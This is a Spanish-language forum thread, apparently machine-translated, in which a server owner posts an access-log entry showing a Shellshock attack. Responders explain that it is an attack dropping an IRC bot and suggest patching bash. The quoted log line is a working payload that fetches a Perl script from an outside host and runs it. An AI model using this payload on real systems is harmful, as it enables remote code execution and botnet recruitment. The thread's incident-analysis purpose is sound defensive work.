Lo vi access.log
en mi servidor de prueba:
> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Ninguna de las direcciones está relacionada conmigo ni con nuestro rango de IP (o cualquier otra cosa) Estaba pensando inmediatamente en el error de seguridad Shellshock / "bashdoor".
En realidad, parece que alguien ha intentado curl
"algo" en el servidor, luego ejecutó ese "algo" y luego eliminó "algo" con -rf
.
Este es un servidor de prueba puro, no se hace daño (== no se puede hacer daño además de la reinstalación), pero el momento es muy interesante. No he visto nada como esto antes, por lo que recuerdo.
¿Debo preocuparme, por ejemplo, estar "interesado"? ¿Alguien tiene alguna idea de qué es esto?
security
shell-script
webserver
davidkonrad
fuente
fuente
Respuestas:
Ese es alguien que explota el error Shellshock. ¿Puedes determinar qué estaba haciendo el script perl? Definitivamente vale la pena meterse en esto. La segunda URL utilizada devuelve un 404, pero
http://213.5.67.223/ji
existe y podría ser lo mismo, ya que es un script perl. Parece ser un servidor IRC de algún tipo, por lo que puede resultar interesante conectarse a su servidor de prueba con un cliente IRC. EDITAR: El comentario me corrigió, es un cliente, tan capaz de espiarlo.Además, verifique si el script perl aún se está ejecutando.
fuente
ps -ax | grep perl
ops ax | grep perl
ps -ef
puedo ver que hay una/usr/sbin/apache2 -k start
con la misma marca de tiempo :( Así que supongo que el ataque ha sido exitoso.sudo apt-get update && sudo apt-get install --only-upgrade bash
shell
rutina que me tenía preocupado: my @ resp =$comando 2>&1 3>&1
; Ningún daño hecho por lo que puedo decir.La vulnerabilidad Shellshock se usa para descargar (usar
wget
) y ejecutar un script Perl malicioso, este ataque es muy básico y requiere la instalación de Perl y wget (suponiendo que uno de ellos no lo esté y está seguro de que no hubo otros intentos de craqueo, su servidor no se vio comprometido).El script en sí es un bot IRC básico para kiddie de script, una vez ejecutado, esa basura se conecta a un servidor IRC y espera comandos, parece que tiene capacidades de búsqueda de Google, lo más probable es que busque automáticamente hosts vulnerables e intente explotarlos. Aparte de eso, por supuesto, tiene el arsenal skiddie básico, que es inundación HTTP, inundación TCP y UDP y acceso a shell (como el usuario que ejecutó el script, que sería el usuario con el que se ejecuta el servidor HTTP).
fuente
Como ya mencionaron otros, este es un intento de script kiddie para explotar la vulnerabilidad bash para ejecutar un bot IRC basado en script perl. Si ha actualizado bash y, además, si ejecuta apache bajo chroot como yo, no tiene nada de qué preocuparse. Veo varias versiones de esto en mi registro (ver más abajo) al menos cada dos días desde el 27/9 ... esto es solo un ruido.
Otra variedad de intentos de ejecución de script (script de python) que acabo de notar hoy ... NOTA: google-traffic-analytics.com donde se descarga el script de python no tiene nada que ver con Google, por supuesto.
fuente